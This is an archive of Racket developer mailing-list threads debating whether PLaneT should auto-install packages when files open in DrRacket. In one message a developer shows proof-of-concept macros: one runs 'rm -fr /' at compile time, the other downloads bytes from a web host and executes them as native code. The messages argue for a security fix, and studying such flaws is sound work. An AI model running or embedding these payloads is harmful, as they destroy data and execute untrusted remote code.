Re: [racket-dev] [plt] Push #27864: master branch updated
Looks great. Thanks, Jay.
Robby
On Wed, Nov 27, 2013 at 8:24 PM, Jay McCarthy wrote:
> I left the other commit in place so that even if users customize
> download? and install? the command-line tool will continue to work.
>
> Jay
>
> On Wed, Nov 27, 2013 at 7:23 PM, wrote:
> > jay has updated `master' from c980182b6b to 1741e1b0d1.
> > http://git.racket-lang.org/plt/c980182b6b..1741e1b0d1
> >
> > =[ 2 Commits ]==
> > Directory summary:
> > 44.7% pkgs/planet-pkgs/planet-doc/planet/
> > 55.2% racket/collects/planet/private/
> >
> > ~~
> >
> > 680b6f4 Jay McCarthy 2013-11-27 19:09
> > :
> > | Revert "Remove arbitrary code execution exploit from Racket and
> DrRacket"
> > |
> > | This reverts commit cf1755fc173cef39c3c4592011623269735084c0.
> > :
> > M racket/collects/planet/private/resolver.rkt | 8
> >
> > ~~
> >
> > 1741e1b Jay McCarthy 2013-11-27 19:22
> > :
> > | Explain how to control whether Planet auto-installation is enabled
> > :
> > M pkgs/planet-pkgs/planet-doc/planet/planet.scrbl | 10 ++
> >
> > =[ Overall Diff ]===
> >
> > pkgs/planet-pkgs/planet-doc/planet/planet.scrbl
> > ~~~
> > --- OLD/pkgs/planet-pkgs/planet-doc/planet/planet.scrbl
> > +++ NEW/pkgs/planet-pkgs/planet-doc/planet/planet.scrbl
> > @@ -8,6 +8,7 @@
> > planet/util
> > planet/version
> > planet/syntax
> > + planet/resolver
> > planet/scribble)
> > scribble/bnf)
> >
> > @@ -160,6 +161,15 @@ Once that is complete, PLaneT will use that version
> of the
> > package for any subsequent @racket[require]s and won't try
> > to use the network.
> >
> > +If you wish to ensure that PLaneT won't use the network even if your
> > +operating system allows it, you can use the @racket[download?]
> > +parameter of the @racketmodname[planet/resolver] module to control
> > +whether it attempts to download files. Similarly, you can use the
> > +@racket[install?] parameter to prevent installation. Finally, you can
> > +block access at the operating system level to the path returned by
> > +@racket[(PLANET-BASE-DIR)] to control which operating system users can
> > +install PLaneT packages.
> > +
> > @subsection{Fine-Grained Control Over Package Imports}
> >
> > The PLaneT client is designed to balance two competing goals:
> >
> > racket/collects/planet/private/resolver.rkt
> > ~~~
> > --- OLD/racket/collects/planet/private/resolver.rkt
> > +++ NEW/racket/collects/planet/private/resolver.rkt
> > @@ -219,9 +219,9 @@ See the scribble documentation on the
> planet/resolver module.
> > (struct-out exn:fail:planet))
> >
> > ;; if #f, will not install packages and instead raise a
> exn:fail:install? error
> > -(define install? (make-parameter #f))
> > +(define install? (make-parameter #t))
> > ;; if #f, will not download packages and instead raise a
> exn:fail:install? error
> > -(define download? (make-parameter #f))
> > +(define download? (make-parameter #t))
> > (define-struct (exn:fail:planet exn:fail) ())
> >
> > ;; update doc index only once for a set of installs:
> > @@ -541,7 +541,7 @@ See the scribble documentation on the
> planet/resolver module.
> >(unless (download?)
> > (raise (make-exn:fail:planet
> > (format
> > - "PLaneT error: cannot download package ~s without
> permission. Give permission with download? parameter or use 'raco planet
> install'"
> > + "PLaneT error: cannot download package ~s since the
> download? parameter is set to #f"
> > (list (car (pkg-spec-path pkg)) (pkg-spec-name pkg)))
> > (current-continuation-marks
> >((if (USE-HTTP-DOWNLOADS?) download-package/http
> download-package/planet)
> > @@ -577,7 +577,7 @@ See the scribble documentation on the
> planet/resolver module.
> >(unless (install?)
> > (raise (make-exn:fail:planet
> > (format
> > - "PLaneT error: cannot install package ~s without
> permission. Give permission with download? parameter or use 'raco planet
> install'"
> > + "PLaneT error: cannot install package ~s since the
> install? parameter is set to #f"
> > (list (car pkg-path) pkg-name maj min))
> > (current-continuation-marks
> >(define owner (car pkg-path))
> _
> Racket Developers list:
> http://lists.racket-lang.org/dev
>
_
Racket Developers list:
http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27864: master branch updated
I left the other commit in place so that even if users customize
download? and install? the command-line tool will continue to work.
Jay
On Wed, Nov 27, 2013 at 7:23 PM, wrote:
> jay has updated `master' from c980182b6b to 1741e1b0d1.
> http://git.racket-lang.org/plt/c980182b6b..1741e1b0d1
>
> =[ 2 Commits ]==
> Directory summary:
> 44.7% pkgs/planet-pkgs/planet-doc/planet/
> 55.2% racket/collects/planet/private/
>
> ~~
>
> 680b6f4 Jay McCarthy 2013-11-27 19:09
> :
> | Revert "Remove arbitrary code execution exploit from Racket and DrRacket"
> |
> | This reverts commit cf1755fc173cef39c3c4592011623269735084c0.
> :
> M racket/collects/planet/private/resolver.rkt | 8
>
> ~~
>
> 1741e1b Jay McCarthy 2013-11-27 19:22
> :
> | Explain how to control whether Planet auto-installation is enabled
> :
> M pkgs/planet-pkgs/planet-doc/planet/planet.scrbl | 10 ++
>
> =[ Overall Diff ]===
>
> pkgs/planet-pkgs/planet-doc/planet/planet.scrbl
> ~~~
> --- OLD/pkgs/planet-pkgs/planet-doc/planet/planet.scrbl
> +++ NEW/pkgs/planet-pkgs/planet-doc/planet/planet.scrbl
> @@ -8,6 +8,7 @@
> planet/util
> planet/version
> planet/syntax
> + planet/resolver
> planet/scribble)
> scribble/bnf)
>
> @@ -160,6 +161,15 @@ Once that is complete, PLaneT will use that version of
> the
> package for any subsequent @racket[require]s and won't try
> to use the network.
>
> +If you wish to ensure that PLaneT won't use the network even if your
> +operating system allows it, you can use the @racket[download?]
> +parameter of the @racketmodname[planet/resolver] module to control
> +whether it attempts to download files. Similarly, you can use the
> +@racket[install?] parameter to prevent installation. Finally, you can
> +block access at the operating system level to the path returned by
> +@racket[(PLANET-BASE-DIR)] to control which operating system users can
> +install PLaneT packages.
> +
> @subsection{Fine-Grained Control Over Package Imports}
>
> The PLaneT client is designed to balance two competing goals:
>
> racket/collects/planet/private/resolver.rkt
> ~~~
> --- OLD/racket/collects/planet/private/resolver.rkt
> +++ NEW/racket/collects/planet/private/resolver.rkt
> @@ -219,9 +219,9 @@ See the scribble documentation on the planet/resolver
> module.
> (struct-out exn:fail:planet))
>
> ;; if #f, will not install packages and instead raise a exn:fail:install?
> error
> -(define install? (make-parameter #f))
> +(define install? (make-parameter #t))
> ;; if #f, will not download packages and instead raise a exn:fail:install?
> error
> -(define download? (make-parameter #f))
> +(define download? (make-parameter #t))
> (define-struct (exn:fail:planet exn:fail) ())
>
> ;; update doc index only once for a set of installs:
> @@ -541,7 +541,7 @@ See the scribble documentation on the planet/resolver
> module.
>(unless (download?)
> (raise (make-exn:fail:planet
> (format
> - "PLaneT error: cannot download package ~s without permission.
> Give permission with download? parameter or use 'raco planet install'"
> + "PLaneT error: cannot download package ~s since the download?
> parameter is set to #f"
> (list (car (pkg-spec-path pkg)) (pkg-spec-name pkg)))
> (current-continuation-marks
>((if (USE-HTTP-DOWNLOADS?) download-package/http download-package/planet)
> @@ -577,7 +577,7 @@ See the scribble documentation on the planet/resolver
> module.
>(unless (install?)
> (raise (make-exn:fail:planet
> (format
> - "PLaneT error: cannot install package ~s without permission.
> Give permission with download? parameter or use 'raco planet install'"
> + "PLaneT error: cannot install package ~s since the install?
> parameter is set to #f"
> (list (car pkg-path) pkg-name maj min))
> (current-continuation-marks
>(define owner (car pkg-path))
_
Racket Developers list:
http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler wrote: > > > > On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy wrote: >> >> If I have background expansion on, then when I open that file it >> installs the package. >> > > As I wrote in my previous message, it doesn't do that for me. And I don't > see how it could do that, actually. Are you saying that you tried this? Yes. I put that in a file and opened it up with DrRacket then got the "Can't download a Planet package" error message as-if the install were stopped. > Can you explain how you have configured DrRacket to disable the security > guard that is installed by the background expansion process, please? Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, "Check Syntax" (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say "Check Syntax" should make no attempt to prevent package installation.] > Meanwhile, I would like to point out that your commit has completely > disabled planet. No packages can be installed. Did you run any test suites > after making this change? I tried to install and fetch some packages. I see now that I committed in the "racket/collects" directory but the changes to make that work were in the "pkgs/planet-pkgs" directory so I stupidly missed them. Jay > Robby > _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy wrote: > If I have background expansion on, then when I open that file it > installs the package. > > As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? Robby _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
If I have background expansion on, then when I open that file it installs the package. Since once a Planet package is installed it is set up and compiled that means that this code: #lang racket (attack) (define-syntax (attack stx) (system "rm -fr /")) is automatically run as soon as I open it up. Furthermore, I could do something like this: #lang racket (attack) (define-syntax (attack stx) (local-require (only-in '#%foreign ffi-call _int32) net/http-client) (define-values (s hs ip) (http-sendrecv "example.com" "/")) (define bs (port->bytes ip)) (printf "got: ~v\n" bs) (define weird-c-code bs) ((ffi-call weird-c-code null _int32))) and really execute any C code that I could find on the Internet. This isn't just a DrRacket problem though. We should not be arbitrarily installing things on people's machines without their consent. This power is too much. The new system of suggesting an install or allowing an opt-in for certain vetted packages is much kinder. Jay On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler wrote: > Can you demonstrate how to make this happen? Opening a file with these > contents, for example, doesn't install anything. > > #lang racket > (require (planet planet/test-connection:1:0/test-connection)) > > As for automatically executing arbitrary code, I think you must mean > something more precise here. Perhaps "code that hasn't already been > explicitly installed"? If that's what you mean, then I think I'm also > missing how this happens. > > Robby > > > On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy wrote: >> >> There is an important change in this commit. Since we've created the >> release branch for 6.0, I think we should stop automatically >> installing and executing arbitrary code when people open files in >> DrRacket. Currently the error message suggests using "raco planet" but >> I think we need a bit of a GUI shim for other users. >> >> On Wed, Nov 27, 2013 at 3:40 PM, wrote: >> > jay has updated `master' from 033065f632 to 60ae164d05. >> > http://git.racket-lang.org/plt/033065f632..60ae164d05 >> > >> > =[ 6 Commits ]== >> > Directory summary: >> > 57.6% pkgs/plt-services/meta/pkg-index/official/static/ >> > 17.6% pkgs/plt-services/meta/pkg-index/official/ >> > 22.0% racket/collects/planet/private/ >> > >> > ~~ >> > >> > 2413278 Jay McCarthy 2013-11-27 14:51 >> > : >> > | moving delete button >> > : >> > M .../meta/pkg-index/official/static/index.html | 2 ++ >> > M .../meta/pkg-index/official/static/index.js | 16 >> > +--- >> > M .../meta/pkg-index/official/static/style.css | 4 >> > >> > ~~ >> > >> > 113696c Jay McCarthy 2013-11-27 14:54 >> > : >> > | edit on lose focus >> > : >> > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- >> > >> > ~~ >> > >> > cf1755f Jay McCarthy 2013-11-27 15:19 >> > : >> > | Remove arbitrary code execution exploit from Racket and DrRacket >> > | >> > | This is particularly bad with DrRacket's online syntax checking, which >> > | causes opening a file to download and executed aribtrary code. >> > : >> > M racket/collects/planet/private/resolver.rkt | 8 >> > >> > ~~ >> > >> > 98df30c Jay McCarthy 2013-11-27 15:30 >> > : >> > | deleting static s3 content properly >> > : >> > M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 >> > ++- >> > >> > ~~ >> > >> > 7b7a5ad Jay McCarthy 2013-11-27 15:33 >> > : >> > | increase pkg test timeout >> > : >> > M pkgs/plt-services/meta/props | 2 +- >> > >> > ~~ >> > >> > 60ae164 Jay McCarthy 2013-11-27 15:39 >> > : >> > | Removing add tag button when not logged in re mflatt >> > : >> > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 >> > +-- >> > M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- >> > >> > =[ Overall Diff ]=== >> > >> > pkgs/plt-services/meta/pkg-index/official/static.rkt >> > >> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt >> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt >> > @@ -304,7 +304,16 @@ >> >(cache "/pkgs" "pkgs") >> >(cache "/pkgs-all" "pkgs-all") >> >(for ([p (in-list pkg-list)]) >> > -(cache (format "/pkg/~a" p) (format "pkg/~a" p >> > +(cache (format "/pkg/~a" p) (format "pkg/~a" p))) >> > + >> > + (let () >> > +(define pkg-path (build-path static-path "pkg")) >> > +(for ([f (in-list (directory-list pkg-path))] >> > + #:unless (regexp-match #"json$" (path->string f)) >> > + #:unless (member (path->string f) pkg-list)) >> > + (with-handlers ([exn:fail:filesystem? void]) >> > +(delete-file (build-path pkg-path f)) >> > +(delete-file (build-path pkg-path (path-add-suffix f >> > #".json"))) >>
Re: [racket-dev] [plt] Push #27862: master branch updated
Can you demonstrate how to make this happen? Opening a file with these contents, for example, doesn't install anything. #lang racket (require (planet planet/test-connection:1:0/test-connection)) As for automatically executing arbitrary code, I think you must mean something more precise here. Perhaps "code that hasn't already been explicitly installed"? If that's what you mean, then I think I'm also missing how this happens. Robby On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy wrote: > There is an important change in this commit. Since we've created the > release branch for 6.0, I think we should stop automatically > installing and executing arbitrary code when people open files in > DrRacket. Currently the error message suggests using "raco planet" but > I think we need a bit of a GUI shim for other users. > > On Wed, Nov 27, 2013 at 3:40 PM, wrote: > > jay has updated `master' from 033065f632 to 60ae164d05. > > http://git.racket-lang.org/plt/033065f632..60ae164d05 > > > > =[ 6 Commits ]== > > Directory summary: > > 57.6% pkgs/plt-services/meta/pkg-index/official/static/ > > 17.6% pkgs/plt-services/meta/pkg-index/official/ > > 22.0% racket/collects/planet/private/ > > > > ~~ > > > > 2413278 Jay McCarthy 2013-11-27 14:51 > > : > > | moving delete button > > : > > M .../meta/pkg-index/official/static/index.html | 2 ++ > > M .../meta/pkg-index/official/static/index.js | 16 > +--- > > M .../meta/pkg-index/official/static/style.css | 4 > > > > ~~ > > > > 113696c Jay McCarthy 2013-11-27 14:54 > > : > > | edit on lose focus > > : > > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- > > > > ~~ > > > > cf1755f Jay McCarthy 2013-11-27 15:19 > > : > > | Remove arbitrary code execution exploit from Racket and DrRacket > > | > > | This is particularly bad with DrRacket's online syntax checking, which > > | causes opening a file to download and executed aribtrary code. > > : > > M racket/collects/planet/private/resolver.rkt | 8 > > > > ~~ > > > > 98df30c Jay McCarthy 2013-11-27 15:30 > > : > > | deleting static s3 content properly > > : > > M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- > > > > ~~ > > > > 7b7a5ad Jay McCarthy 2013-11-27 15:33 > > : > > | increase pkg test timeout > > : > > M pkgs/plt-services/meta/props | 2 +- > > > > ~~ > > > > 60ae164 Jay McCarthy 2013-11-27 15:39 > > : > > | Removing add tag button when not logged in re mflatt > > : > > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 > +-- > > M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- > > > > =[ Overall Diff ]=== > > > > pkgs/plt-services/meta/pkg-index/official/static.rkt > > > > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt > > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt > > @@ -304,7 +304,16 @@ > >(cache "/pkgs" "pkgs") > >(cache "/pkgs-all" "pkgs-all") > >(for ([p (in-list pkg-list)]) > > -(cache (format "/pkg/~a" p) (format "pkg/~a" p > > +(cache (format "/pkg/~a" p) (format "pkg/~a" p))) > > + > > + (let () > > +(define pkg-path (build-path static-path "pkg")) > > +(for ([f (in-list (directory-list pkg-path))] > > + #:unless (regexp-match #"json$" (path->string f)) > > + #:unless (member (path->string f) pkg-list)) > > + (with-handlers ([exn:fail:filesystem? void]) > > +(delete-file (build-path pkg-path f)) > > +(delete-file (build-path pkg-path (path-add-suffix f > #".json"))) > > > > (module+ main > >(require racket/cmdline) > > > > pkgs/plt-services/meta/pkg-index/official/static/index.html > > ~~~ > > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html > > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html > > @@ -54,12 +54,14 @@ > > Last Edit: id="pi_last_edit"> > > Description: id="pi_description"> > > Tags: > > - class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag > > + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag > > Versions Exceptions id="pi_versions"> > > id="pi_add_version_row">Version: type="text" id="pi_add_version_text" class="text ui-widget-content > ui-corner-all" />Source: id="pi_add_version_source_text" class="text ui-widget-content > ui-corner-all" />Add Version > Exception > > Dependencies id="pi_dependencies"> > > Conflicts id="pi_conflicts"> > > Modules > > + id="pi_delete_button">Delete > > +Package(there is no undo!) > > > > > >
Re: [racket-dev] [plt] Push #27862: master branch updated
There is an important change in this commit. Since we've created the
release branch for 6.0, I think we should stop automatically
installing and executing arbitrary code when people open files in
DrRacket. Currently the error message suggests using "raco planet" but
I think we need a bit of a GUI shim for other users.
On Wed, Nov 27, 2013 at 3:40 PM, wrote:
> jay has updated `master' from 033065f632 to 60ae164d05.
> http://git.racket-lang.org/plt/033065f632..60ae164d05
>
> =[ 6 Commits ]==
> Directory summary:
> 57.6% pkgs/plt-services/meta/pkg-index/official/static/
> 17.6% pkgs/plt-services/meta/pkg-index/official/
> 22.0% racket/collects/planet/private/
>
> ~~
>
> 2413278 Jay McCarthy 2013-11-27 14:51
> :
> | moving delete button
> :
> M .../meta/pkg-index/official/static/index.html | 2 ++
> M .../meta/pkg-index/official/static/index.js | 16
> +---
> M .../meta/pkg-index/official/static/style.css | 4
>
> ~~
>
> 113696c Jay McCarthy 2013-11-27 14:54
> :
> | edit on lose focus
> :
> M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
>
> ~~
>
> cf1755f Jay McCarthy 2013-11-27 15:19
> :
> | Remove arbitrary code execution exploit from Racket and DrRacket
> |
> | This is particularly bad with DrRacket's online syntax checking, which
> | causes opening a file to download and executed aribtrary code.
> :
> M racket/collects/planet/private/resolver.rkt | 8
>
> ~~
>
> 98df30c Jay McCarthy 2013-11-27 15:30
> :
> | deleting static s3 content properly
> :
> M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++-
>
> ~~
>
> 7b7a5ad Jay McCarthy 2013-11-27 15:33
> :
> | increase pkg test timeout
> :
> M pkgs/plt-services/meta/props | 2 +-
>
> ~~
>
> 60ae164 Jay McCarthy 2013-11-27 15:39
> :
> | Removing add tag button when not logged in re mflatt
> :
> M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11
> +--
> M .../plt-services/meta/pkg-index/official/static/index.html | 2 +-
>
> =[ Overall Diff ]===
>
> pkgs/plt-services/meta/pkg-index/official/static.rkt
>
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
> @@ -304,7 +304,16 @@
>(cache "/pkgs" "pkgs")
>(cache "/pkgs-all" "pkgs-all")
>(for ([p (in-list pkg-list)])
> -(cache (format "/pkg/~a" p) (format "pkg/~a" p
> +(cache (format "/pkg/~a" p) (format "pkg/~a" p)))
> +
> + (let ()
> +(define pkg-path (build-path static-path "pkg"))
> +(for ([f (in-list (directory-list pkg-path))]
> + #:unless (regexp-match #"json$" (path->string f))
> + #:unless (member (path->string f) pkg-list))
> + (with-handlers ([exn:fail:filesystem? void])
> +(delete-file (build-path pkg-path f))
> +(delete-file (build-path pkg-path (path-add-suffix f #".json")))
>
> (module+ main
>(require racket/cmdline)
>
> pkgs/plt-services/meta/pkg-index/official/static/index.html
> ~~~
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html
> @@ -54,12 +54,14 @@
> Last Edit:
> Description: id="pi_description">
> Tags:
> -Add
> Tag
> + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag
> Versions Exceptions id="pi_versions">
> Version:
> Source: id="pi_add_version_source_text" class="text ui-widget-content ui-corner-all"
> />Add Version Exception
> Dependencies id="pi_dependencies">
> Conflicts id="pi_conflicts">
> Modules
> + id="pi_delete_button">Delete
> +Package(there is no undo!)
>
>
>Install this package
> with:raco pkg install id="pi_name_inst">or, with the 'File|Install Package...'
> menu option in DrRacket.
>
> pkgs/plt-services/meta/pkg-index/official/static/index.js
> ~
> --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.js
> +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.js
> @@ -8,6 +8,8 @@ function me () {
> return localStorage['email']; }
>
> $( document ).ready(function() {
> +var logged_in = false;
> +
> function jslink ( texts, clickf) {
> return $('', { href: "javascript:void(0)",
>click: clickf } ).html(texts); }
> @@ -43,7 +45,7 @@ $( document ).ready(function() {
> update_package_on_list ( pkgi );
> // console.log( pkgi );
> change_hash( "[" + pkgi['name'] + "]" );
> -
> +
> var mypkg_p = ($.inArr
[racket-dev] release snapshots
I've move the northwestern release snapshots to a slightly different URL. Apologies for any confusion; they are now at: http://plt.eecs.northwestern.edu/release-snapshots/ (rsync is in the middle of pushing things over there; it should be in done in less than an hour (hopefully a lot less). Robby _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] plausible hash function for s16vectors
At Tue, 26 Nov 2013 13:39:31 -0800, John Clements wrote: > My question: is there an accepted hash function for an s16vector, or > more generally, for a big block of memory? No, not currently. > Taking a look at the behavior of vectors, though, it looks like *every* > element is considered in computing the hash. [...] > Which suggests that every change to the vector changes the result of > the hash function. This seems... really expensive! The hashing functions are generally linear in the size of the value being hashed. That's not currently documented, as it should be. To hash a list, array, transparent structure, hash table, etc., each element is hashed recursively, but there is currently a limit on the depth of recursive hash calls to 128 so that the hash function doesn't have to detect cycles. (Lists are treated differently from non-list pairs in that hashing the `rest` doesn't count against the depth.) > My current guess is that Racket > uses a highly optimized (a.k.a. no safety checks) hash function that works > over arbitrary blocks of data, No. In the case of a vector, for example, the hash function is called recursively on each element of the vector. > Questions: > > 1) Am I guessing right? Mostly. > 2) Is this documented somewhere? No, and I'll fix that. > 3) Is there a generic memory-hash function in the unsafe interface somewhere? Not currently. > 4) Does the hash function affect the time taken by 'equal?' -- i.e., > the hash value is cached for faster equal? checking ? No, `equal?` doesn't hash its arguments. _ Racket Developers list: http://lists.racket-lang.org/dev
